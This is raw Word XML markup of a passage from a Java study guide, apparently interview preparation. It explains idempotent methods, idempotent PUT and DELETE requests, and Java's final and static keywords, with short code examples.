    <w:p w14:paraId="6EB06725" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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getUser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071F35A" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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userName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E916F61" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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C6AB21C" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443FA14B" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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81B9685" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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UserService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> servic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UserService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A4D6D" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        servi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pdateUserNam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Joh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First call, userName is set to "John"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2911A8" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        servi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pdateUserNam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Joh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econd call, no effect, as userName is already "John"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249749AD" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF23E0C" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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ervi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User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 John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A434826" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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1D93123" w14:textId="5B05591E" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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59C94FAC" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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e above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B025BF1" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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updateUserName method is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because calling it multiple times with the same argument (in this case, "John") has no effect after the first call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448DF9F4" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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name is already "John", it won't be updated again, ensuring the state remains consistent regardless of how many times the method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BAD179" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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dempotency in Web Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02BB8A" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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the context of web services (RESTful APIs), idempotency is important. A typical example is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUT</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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E179E4" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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T</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> request: If you update the same resource with the same data multiple times, the result should be the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0E1B16" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> request: Deleting a resource multiple times should not cause errors. Once a resource is deleted, further attempts to delete the same resource should return a successful response, such as a "no content" response, without causing any errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B31ED30" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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dempotent Operations in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75652E3D" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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 are a few examples of idempotent operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ABD844" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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t Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For instance, adding an element to a set where the set already contains that element (e.g., HashSet) is idempotent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C947727" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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tting the same value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Assigning a value to a variable that already has that value is an idempotent operation (e.g., setting a = 5 multiple times).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABF3D4" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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atabase Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you are using an UPDATE SQL query where the new value is the same as the old value, the query is idempotent because the database state does not change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB5CBC7" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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dempotency in Java's Concurrency and Distributed Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257813D" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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dempotency is also a critical concept in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where retries may happen due to network failures or timeouts. If the same operation is retried multiple times (like processing a payment or updating a resource), ensuring that the operation is idempotent prevents inconsistent states and duplicate actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205C2E0" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211CA52" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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dempotent Message Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In message-driven systems, if the same message is processed multiple times due to a failure, the system should ensure that the result is the same and no duplicate actions are taken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B4F14" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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1E65A150" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one where repeated invocations with the same parameters do not change the result beyond the initial execution. This concept is essential in ensuring consistency and reliability, especially in distributed systems, web services, and concurrent programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70DA83" w14:textId="4DD7DC7D" w:rsidR="0029340F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0029340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0F04D71">
          <v:rect id="_x0000_i1166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2E44C" w14:textId="730706A3" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="002A2156">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc196307522"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is final, static and non-static (instance) in java</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="3F00C980" w14:textId="2597BA80" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="007C4888">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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inal, static, and non-static (instance) in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F0433"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se are three important keywords in Java, each with different uses and characteristics. Let's break them down one by one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3890E40E" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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final in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989CA86"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final keyword in Java can be used with variables, methods, and classes, and its meaning varies based on where it is applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B3D90" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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 final with Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E590B5"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you declare a variable as final, its value cannot be changed once it is initialized. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED4FF5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6265BB"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179886"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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MAX_VALU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00</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08773E8C" w14:textId="4BD7F2A6"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179886"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// MAX_VALUE = 200; // This will result in a compilation error</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7541B5FF" w14:textId="056C00AB" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EFECAC"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e example above, once MAX_VALUE is assigned a value, it cannot be modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33577833" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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b) final with Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAAFDCA"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a method is declared as final, it cannot be overridden by subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7103D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B0ABE9"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627194"/>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are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FBFBF72"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6271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displ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A203BED"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6271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This is a final method."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A7BFD3"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6271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B76DB7D"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627194"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF4273"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627194"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F34E8F4"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627194"/>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hil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xtend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are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BD9B4CD"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6271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he following line will cause a compile-time error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA0659"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6271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ublic void display() { }  // Cannot override the final method from Parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7F6629" w14:textId="21027D0D"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627194"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3457E3D6" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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 final with Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC4C1B"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a class is declared as final, it cannot be subclassed. This means you cannot extend a final class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A906698"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F293573"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82963"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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inal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AF47ABB"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8296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lass implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40153ECF"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82963"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A17742D"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82963"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D0A82E"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82963"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// The following will cause a compile-time error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29074DC2" w14:textId="22CA15AE"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82963"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// class SubClass extends FinalClass {} // Cannot subclass a final class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58188AB1" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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static in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D8942"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static keyword is used to indicate that a particular member (field, method, or block) belongs to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than any instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D78478" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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 static with Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37019AC1"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static variable is shared among all instances of the class. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common to all objects of that class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
